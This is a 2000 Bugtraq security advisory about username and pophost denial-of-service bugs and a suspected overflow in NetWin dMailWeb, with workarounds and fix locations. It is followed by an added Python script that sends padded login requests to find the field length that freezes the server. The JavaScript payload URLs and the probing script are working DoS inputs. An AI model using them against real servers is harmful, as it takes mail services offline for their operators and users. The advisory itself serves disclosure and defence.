Bugtraq mailing list archives
NetWin dMailWeb Denial of Service
From: 9cw4 () QLINK QUEENSU CA (Chris Wolfe)
Date: Wed, 21 Jun 2000 11:52:22 -0400
Product:  NetWin dMailWeb
Type:     Denial of Service
Severity: Moderate
Versions: <= 2.6j: potential buffer overflow in pophost (not fixed)
          <= 2.6i: pophost DOS (fixed by 2.6j)
          <= 2.6g: username DOS (fixed by 2.6i)
Note:     NetWin cwMail is also vulnerable to the same attacks, and appears
          to be using exactly the same version numbers.

---
Overview

dMailWeb is a CGI application used to provide web-based e-mail in
collaboration with a standard POP server. Authentication is performed by
attempting to log into the requested POP server with the supplied username
and password. An optional feature allows connection to a POP server other
than the default (or to one of a limited list of POP servers); this server
can be specified on the login page in the pophost field.

Sending long values as the username (>= 240 chars; 239 works normally)
causes the script to freeze (for just over a minute on the machines
tested). The pophost field has a similar problem, though it requires more
characters to trigger (tested with 512). An extremely long pophost (tested
with 1024) causes the script to freeze and then crash. I am not equipped to
test for buffer overflow conditions, but suspect one is the cause of the
crash. (2.6j removed the delay but still crashes.)

The DOS was tested using a Perl script from a Linux P200. After
approximately 70 requests in 45 seconds the target machine's networking
services were completely unavailable. The script is trivial enough that I
am not going to tidy it up to publish here.

---
Tested

Target: Linux 2.2.14 (Slackware 7), Pentium 200, 96 Mb RAM
        Apache 1.3.12, dMail 2.7r (trial)
        dMailWeb 2.5e, 2.6g, 2.6i, 2.6j (all trial versions)
        NetWin dMailWeb demo server

---
Exploit

The freezes were tested using simple JavaScript URLs to enter long values
in the fields. After running one of the URLs, simply enter garbage in the
remainder of the fields and press Login.

- username (>= 240 A's, all on one line)
  javascript:document.loginform.user.value="AA...AA"; alert(document.loginform.user.value);

- pophost (tested with 512 A's, all on one line)
  javascript:document.loginform.pophost.value="AA...AA"; alert(document.loginform.pophost.value);

---
Workaround

Use the force_primary ini directive to prevent the pophost field from being
processed. Ensure your script user has processor limits set (for Apache,
the RLimitCPU and RLimitMEM directives) so that a stalled CGI cannot take
the entire server down with it.

See: http://www.netwinsite.com/dmailweb/dmailweb.htm

---
Solution

New versions of dMailWeb (and cwMail) can be downloaded from:
ftp://ftp.netwinsite.com/dmailweb/

As of Jun 21 the partially fixed versions are still in beta testing. They
can be downloaded from:
ftp://ftp.netwinsite.com/dmailweb/beta/

---
History

A notification was sent to NetWin Jun 5, 2000 regarding the username DOS.
An update was sent to NetWin Jun 6, 2000 adding the pophost DOS and
potential overflow.

---
Copyright 2000, Christopher Wolfe. Permission is granted to reproduce this
advisory in a complete and unmodified form.

This advisory is provided with no warranties of any kind, express or
implied. In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this advisory or
the information contained therein.

Queen's University is in no way related to this message, the information
contained therein, or the actions taken in its gathering; it is simply the
e-mail address with which I am subscribed to BugTraq.
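The advisory gives a hard boundary for the username field (239 characters works, 240 freezes) but only a single tested value for pophost. The script below is an added example, not the author's Perl script and not NetWin code: it builds the login POST with one field padded to a chosen length, counts a request that exceeds a time limit (or errors out) as a freeze, and binary-searches for the smallest length that freezes the CGI. The CGI URL, the POST method and the `pass` field name are assumptions; `user` and `pophost` are the field names the advisory's JavaScript URLs use. Point it only at a server you are authorised to test, since each probe past the threshold ties up the target for over a minute.

```python
"""Probe for the smallest field length that stalls a dMailWeb login.

Added example. Assumptions not stated in the advisory: the login form is
POSTed to DMAILWEB_URL, the password field is named `pass`, and any request
that takes longer than FREEZE_SECONDS (or fails at the socket level) is
counted as a freeze.
"""
import time
import urllib.parse
import urllib.request

DMAILWEB_URL = "http://target.example/cgi-bin/dmailweb.cgi"  # assumption
FREEZE_SECONDS = 10.0   # well below the ~1 minute stall the advisory reports
FIELDS = ("user", "pass", "pophost")


def build_login_body(field, length, fill="A"):
    """URL-encoded login form with one field padded to `length` characters."""
    if field not in FIELDS:
        raise ValueError("unknown form field: %r" % field)
    # Baseline values are placeholders (constructed), not real credentials.
    form = {"user": "x", "pass": "x", "pophost": "pop.example"}
    form[field] = fill * length
    return urllib.parse.urlencode(form).encode()


def http_freezes(field, length, url=DMAILWEB_URL, limit=FREEZE_SECONDS):
    """Send one login request; True if it stalls past `limit` seconds."""
    req = urllib.request.Request(url, data=build_login_body(field, length),
                                 method="POST")
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=limit) as resp:
            resp.read()
    except OSError:
        # socket timeout, connection refused/reset, URLError: all OSError
        # subclasses. Treat any of them as the CGI (or the box) being wedged.
        return True
    return time.monotonic() - start > limit


def find_threshold(freezes, lo=1, hi=2048):
    """Smallest length in [lo, hi] for which freezes(length) is True, else None.

    Assumes monotonic behaviour (if a length freezes, every longer length
    does too), which matches what the advisory reports for the username.
    """
    if not freezes(hi):
        return None
    while lo < hi:
        mid = (lo + hi) // 2
        if freezes(mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


if __name__ == "__main__":
    for name in ("user", "pophost"):
        threshold = find_threshold(lambda n, f=name: http_freezes(f, n))
        print("%s: freeze threshold = %s" % (name, threshold))
```

Because the probe predicate is injected, the search logic can be checked offline with a fake sender; against a live 2.6g install the `user` search should land on 240, matching the advisory, while the pophost result tells you how much slack a length limit in front of the CGI actually needs.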